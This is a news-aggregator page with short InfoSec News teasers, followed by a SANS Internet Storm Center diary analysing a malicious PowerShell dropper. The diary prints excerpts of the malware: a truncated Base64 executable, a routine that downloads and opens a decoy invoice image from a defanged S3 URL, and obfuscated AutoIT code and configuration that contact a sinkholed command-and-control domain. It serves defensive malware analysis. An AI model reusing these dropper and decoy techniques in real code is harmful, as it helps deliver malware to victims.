Posted by InfoSec News on Oct 23

https://www.reuters.com/article/us-crowdstrike-ipo-exclusive/exclusive-crowdstrike-hires-goldman-sachs-to-lead-ipo-sources-idUSKCN1MT2RA

By Liana B. Baker, Carl O'Donnell
Reuters.com
OCTOBER 19, 2018

NEW YORK/SAN FRANCISCO (Reuters) - Cybersecurity software maker
CrowdStrike Inc has hired investment bank Goldman Sachs Group to prepare
for an initial public offering that could come in the first half of next
year, people familiar with the...
 

Posted by InfoSec News on Oct 23

https://www.healthcarefinancenews.com/news/cant-afford-security-chief-here-are-alternatives

By Susan Morse
Senior Editor
Healthcare Finance
October 22, 2018

Particularly for smaller hospitals and medical groups, hiring a full-time
chief information security officer can be a stretch of the budget and
resources. But patient data must still be protected because smaller
organizations face many of the same risks larger systems do.

So...
 

Posted by InfoSec News on Oct 23

http://www.kcur.org/post/meet-kansas-woman-who-exposed-security-flaws-kris-kobachs-voter-fraud-tool

By PEGGY LOWE
KCUR.org
OCT 21, 2018

Come in and sit down at Anita Parsa's kitchen table. Help yourself to the
chocolate chip cookies and she'll get you an iced tea. Might as well make
yourself comfortable.

Because for the next hour, she's going to school you on a massive
voter-tracking program run by Kansas Secretary of State...
 

Posted by InfoSec News on Oct 23

https://bgr.com/2018/10/22/model-s-stolen-video-key-fob-attack-thieves-footage/

By Yoni Heisler
BGR.com
October 22nd, 2018

Tesla vehicles are jam-packed with advanced technologies and stringent
security measures, but the cars still aren't 100% safe from crafty thieves
intent on stealing one. To that point, security cam footage uploaded to
YouTube over the weekend shows two thieves stealing a Tesla Model S in
England, albeit with a...
 

Posted by InfoSec News on Oct 23

http://www.cwbchicago.com/2018/10/divvy-conducts-annual-bike-inventory.html

[I'm sure you will see some parallels between the physical security issues
here, and many security issues on the enterprise. - WK]

By CWB Chicago Staff
October 22, 2018

The operators of Chicago's Divvy bike share program have conducted their
annual inventory of the system’s ubiquitous blue bicycles. But the true
extent of this summer's widespread...
 

I found another interesting piece of malicious Powershell while hunting. The file size is 1.3MB and most of the file is a PE file Base64 encoded. You can immediately detect it by checking the first characters of the string:

$peString = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAA...'

“TVqQAA” indicates a PE file! Often, people think that Powershell must be heavily obfuscated to bypass antivirus engines. This is not always the case! The SHA256 hash is 53e954a7d36706d1f4951ca04b151055ded332e681a672e13e6cab634d74783d and the current VT score is only 3/56[1].

A first interesting feature is the Powershell detection to make the script run on multiple versions of Windows:

$osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;
$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";
$poshVersion = $PSVersionTable.PSVersion.Major;

But, what’s also interesting is the use of a decoy picture. The script downloads a fake invoice from an Amazon S3 bucket:

It displays it using the Start-Process cmdlet:

$decoyName = "$randomStr" + '.jpg';
$decoyURL = 'hxxp://s3.us-east-2.amazonaws[.]com/qeeqq/guru.jpg';
$decoyPath = "$env:APPDATA" + '\' + "$decoyName";
$webClient = New-Object System.Net.WebClient;
$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);
Start-Process $decoyPath;

What is interesting here, if you specify a non-executable file, Start-Process starts the program that is associated with the file, similar to the Invoke-Item cmdlet. So, the victim will see the picture using his/her preferred viewer! In the background, the executable is decoded and executed (SHA256:0e4c61741e81b3fa08df0622419fee5d350a67687fac76249b57eed89e129707 - VT score: 0). It drops a standard AutoIT3.exe file on disk into %APPDATA% and the corresponding script (SHA256:d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d - VT score: 0). The AutoIT script is obfuscated but not protected:

$ head -20 d5a8cdc7ae6a49233ee021a39f12ef61c630202f68edc3a7d64fd1b616704d8d.bad
#NoTrayIcon
Global Const $4063A0C69862A72A9 = 0x1
Global Const $53675A741B726EAC88522D14B9F334E1 = 24
Global Const $368080A29D90F5BA0B1D1E0DEAF11686 = 0xF0000000
Global Const $2BADE2A6917E4FD3141FF478399B9C29 = 0x0004
Global Const $D7B87DBC9EBFE9B98E86AC402AF30278 = 0x0002
Global Const $A4E74B3D571DD28A4BD46AFED2FF9A21 = 0x00000001
Global Const $B939F5E560A162C57C19FFD63367B64E = 1
Global Const $72C3DED1B4617DC9E36E9F0FA1ECD04B = 0x00008001
Global Const $B6D07C74BD5D1C5988597C22A366633F = 0x00008002
Global Const $AC23469B485C91685E66323634795BB3 = 0x00008003
Global Const $A2FCA4C08C8A3F1468D8E746E31AB5CB = 0x00008004
Global Const $487AA7ED5C22C2DBED5BE8784863E3CA = 0x00006603
Global Const $F23BABECD6E4A8BB507295A70C116B81 = 0x0000660e
Global Const $893529605D2CC4E08C633862AF17D045 = 0x0000660f
Global Const $D55A30AD6906FF18C3F0AD47673624E1 = 0x00006610
Global Const $D9E2A9D97C7FFBAD9D504886A359FB4A = 0x00006601
Global Const $4350DEA878C5E4A2BAB83C4406A8B26B = 0x00006602
Global Const $75A2FB145F3605CA0DA3CA48D7B9C281 = 0x00006801
Global Const $1295974546E6E9CA72B1205FD83C6F10 = 0

The initial PE file drops also a bunch of files:

Those files contain configuration data used by the AutoIT script. Example, the file 'qut.docx' contains obfuscated data:

$ head -20 qut.docx.bad
iZ5GeS7u6g62Hex92a7PUW44v3
lHy12Fo16eFem13k015VrSDJ65pa6cg416jGU2I06l9s
[Setting]
985P20
h46bQ48V3pDwlL37o9LL23c00j5e6T4Z592107YV8nL75
K3973xib52001GRn010J1j5i95
BDD0302a82XA2486P6x3N
HDX_Keys=433643363536343446464534374330344533414641454339363134443445433237354544314642383532364332463738
d93ek330eLihYI4s16gNW6bHL
9L017Z3795kB5vwg42XPik99D3h4It54862H16Pnt3uR4vrgxO7226HboT443S4321y29bHHM6wY9C178
0968s7P45e4V26E5npKuy7O32Tsi1XK681k0189u46K1Bk6im08k08F6hm7rS2q4aDiIP5cy284
GN22P2a20x0V11Q5
Keys=trx
dE5481u423Zv59D02ZM1z3f3r43cT371Ku1
1Nf0O3178c52668b
Dir=33623513
97JcnL
xs6vh880PP5875PC7IU3V1xSsEGkS992l9j2w8Ad4a79434pD9Rj6350ln
xH3x33W33h0255OD6C2UH2DN9JE7Q3v1Z9n03v38rnZ4s4GMps2VG646k-6LQh614D7m713LdoL3xa800561n7bkC5r74B2509cj1Y6656i5

In the AutoIT script, we can find:

$6D8EA853F0F9D4F4725A7B18BA8E68E5 = @ScriptDir & "\qut.docx"
$989BD8DF7434150DDDCC4E3AF84571E3 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "Dir", '')
$9355FBBA246C8217C04EE3075C218909 = @TempDir & "\" & $989BD8DF7434150DDDCC4E3AF84571E3
Func _S0x325952AE1C47E8F062A74927A1DBE55B()
    $39EE801D7E22D21808919DD1A991F950 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "msg", '')
    If $39EE801D7E22D21808919DD1A991F950 <> '' Then
        _S0xCD06933F8DF7350D8A7AA4D9F1BAFB5B()
    EndIf
    $4FE9C92D9445918D1759387A12138EA3 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "_S0x20057179D673181B71D4593BFB2A0450", '')
    If $4FE9C92D9445918D1759387A12138EA3 <> '' Then
        _S0x20057179D673181B71D4593BFB2A0450()
    EndIf

The AutoIT script tries to contact xzit007[.]ddns[.]net (a DNS sinkhole is already in place) but I found 32 entries in passive DNS.

I'm still busy to analyze the script but does it ring a bell to you? Please share if you recognize this behaviour!

[1] https://www.virustotal.com/#/file/53e954a7d36706d1f4951ca04b151055ded332e681a672e13e6cab634d74783d/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status